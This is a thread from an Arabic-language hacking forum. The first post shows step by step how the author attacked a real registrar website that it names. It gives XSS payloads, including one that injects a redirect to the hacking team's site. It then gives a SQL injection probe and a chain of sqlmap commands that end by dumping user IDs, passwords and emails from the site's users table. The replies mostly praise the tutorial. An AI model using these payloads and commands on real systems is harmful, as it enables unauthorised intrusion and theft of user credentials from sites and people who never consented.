1. خأإآلد

    خأإآلد DeveloPer Plus

    الأنتساب:
    ‏18 ديسمبر 2011
    المشاركات:
    108
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    18
    الإقامة:
    K.s.A
    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله وبركاته

    اليوم اعود لكم بشرح اكتشاف ثغرات الموزع وكيف يتم استغلالها بشكل مفصل لكي تتم

    الفايده من الموضوع بصراحه صاحب الفكره المبدع برستيج جزاه الله خير الجزاء

    حبيت اوضح الفكره في الشبكه لتعم الفائده بشكل اكثر

    معنا هذا الموزع تحت المجهر

    http://www.nic.mw/

    قلت خلني اتفحصه واشوف شنو فيه والحمدالله اكتشفت فيه ثغرتين

    sql & xss

    طيب نضع لمسات مصوره *:"

    [​IMG]

    نشوف الأن كيف تم اكتشاف الثغره xss

    نشوف محرك البحث

    ونجرب هذا الكود

    كود PHP:
    <<SCRIPT>alert("hacked by IQ-TeaM ");//<</SCRIPT>
    [​IMG]

    النتيجه ُ;)ًٌُ

    [​IMG]

    طلع فيه اصابه الحين نشوف نزرع كود التحويل

    نجرب الكود

    كود PHP:
    '<script>location.replace("http://www.iq-team.org");</script>'
    [​IMG]

    نشوف المسار والتحويل

    كود PHP:
    http://www.nic.mw/index.php?d=0&domain=%27%3Cscript%3Elocation.replace%28%22http%3A%2F%2Fwww.iq-team.org%22%29%3B%3C%2Fscript%3E%27&Submit=Search
    النتيجه

    [​IMG]

    تمام تم التحويل

    نتقل الان الى الثغره الثانيه الي هي sql

    نشوف كيف تم اكنتشافها

    كود PHP:
    http://www.nic.mw/index.php?d=0&domain=1'%20AND%201=3%20'
    [​IMG]

    احتمال اصابته بنوع بلند سكويل قلنا خلنا نشوف sqlmap

    نشوف الامر

    كود PHP:
    python sqlmap.py -"http://www.nic.mw/index.php?d=0&domain=1" --dbs
    وكانت النتيجه زي ما توقعت انه مصاب

    نشوف الناتج

    [​IMG]

    نكمل الحين باقي الاوامر

    كود PHP:
    python sqlmap.py -"http://www.nic.mw/index.php?d=0&domain=1" -D tarsus --tables
    [​IMG]

    اوكي تمام نشوف الحين جدول users

    نستخدم هذا الامر

    كود PHP:
    python sqlmap.py -"http://www.nic.mw/index.php?d=0&domain=1" -D tarsus -T users --columns
    النتيجة

    [​IMG]

    نستخرج الحين البينات النهائيه

    نستخدم الامر

    كود PHP:
    python sqlmap.py -"http://www.nic.mw/index.php?d=0&domain=1" -D tarsus -T users -C user_id,password,email --dump
    ونشوف النتيجه

    [​IMG]

    تم استخراج البينات من القاعده

    والسلام خير الختام والسلام علكيم ورحمة الله وبركاته
     
    1 person likes this.
  2. Tej HAcKEr

    Tej HAcKEr DeveloPer Plus

    الأنتساب:
    ‏15 ديسمبر 2011
    المشاركات:
    133
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    18
    الوظيفة:
    hacker
    الإقامة:
    Tunisia
    رد: اكتشاف ثغرات الموزع وكيف يتم استغلالها dns

    صراحا انتا مبدع وموضوعك رائع جدأأ شكرأأ لمجهودك راقي والمميز
     
  3. Yousef

    Yousef <link href="http://www.iq-team.org/vb/ghost/ghost. DeveloPer Plus

    الأنتساب:
    ‏1 نوفمبر 2012
    المشاركات:
    118
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    18
    رد: اكتشاف ثغرات الموزع وكيف يتم استغلالها dns

    وعليكم السلام

    يعطيك الف عافية يا غالى

    بتوفيق يا غالى ً#ٌ5oًًًُ.
     
  4. خأإآلد

    خأإآلد DeveloPer Plus

    الأنتساب:
    ‏18 ديسمبر 2011
    المشاركات:
    108
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    18
    الإقامة:
    K.s.A
    رد: اكتشاف ثغرات الموزع وكيف يتم استغلالها dns

    تسلموا شباب على المرور الرائع
     
  5. KaBriMO

    KaBriMO Developer

    الأنتساب:
    ‏14 يوليو 2012
    المشاركات:
    39
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    المغرب
    رد: اكتشاف ثغرات الموزع وكيف يتم استغلالها dns

    [font="ae_almothnna"]مشكوور على الشرح ..![/font]
     
  6. Hell_Hac

    Hell_Hac Developer

    الأنتساب:
    ‏16 يونيو 2013
    المشاركات:
    29
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الإقامة:
    آلمـدينـة آلمنـورة
    رد: اكتشاف ثغرات الموزع وكيف يتم استغلالها dns

    جميل جدا مشاء الله عليك اخي الكريم

    بارك الله فيك
     
  7. صــــاروخ

    صــــاروخ Developer

    الأنتساب:
    ‏3 ديسمبر 2012
    المشاركات:
    31
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    رد: اكتشاف ثغرات الموزع وكيف يتم استغلالها dns

    شرح أكثر من رائع و موضوع منسق بشكل أروع

    مشكور حبيبي الغالي

    يوشم بالخماسي + التقييم لشخصك الكريم

    تحياتي حبيبي
     
  8. •● ṔriNḉẻ ●•

    •● ṔriNḉẻ ●• DeveloPer Plus

    الأنتساب:
    ‏5 يناير 2013
    المشاركات:
    100
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    16
    الإقامة:
    Hollywood
    رد: اكتشاف ثغرات الموزع وكيف يتم استغلالها dns

    وعليكم السلام ورحمة الله و بركاته

    بارك الله فيك أخي شرح رائع

    واصل ابداعك ولا تحرمنا من جديدك يالغالي​
     
  9. Al-JoKeR

    Al-JoKeR مساعد مشرف

    الأنتساب:
    ‏22 ديسمبر 2011
    المشاركات:
    133
    الإعجابات المتلقاة:
    6
    نقاط الجائزة:
    18
    الوظيفة:
    طالب علم
    الإقامة:
    الجنة ان شاء الله
    رد: اكتشاف ثغرات الموزع وكيف يتم استغلالها dns

    جزاك الله كل خير أخي
    إبداع وتألق دائمين​
     
  10. TIGERs HAKER

    TIGERs HAKER Active DeveloPer

    الأنتساب:
    ‏2 نوفمبر 2012
    المشاركات:
    88
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    رد: اكتشاف ثغرات الموزع وكيف يتم استغلالها dns

    بسمَ آللهِ مـآ شآءِ آللهُِ ،،
    شرٍح مبسطُ وبطرٍيقهِ روٍوٍعهِ ..
    آللهِ يعطُيكَ آلعآفيهُِ .. {ً#ٌ5oًًًُ. }
     

مشاركة هذه الصفحة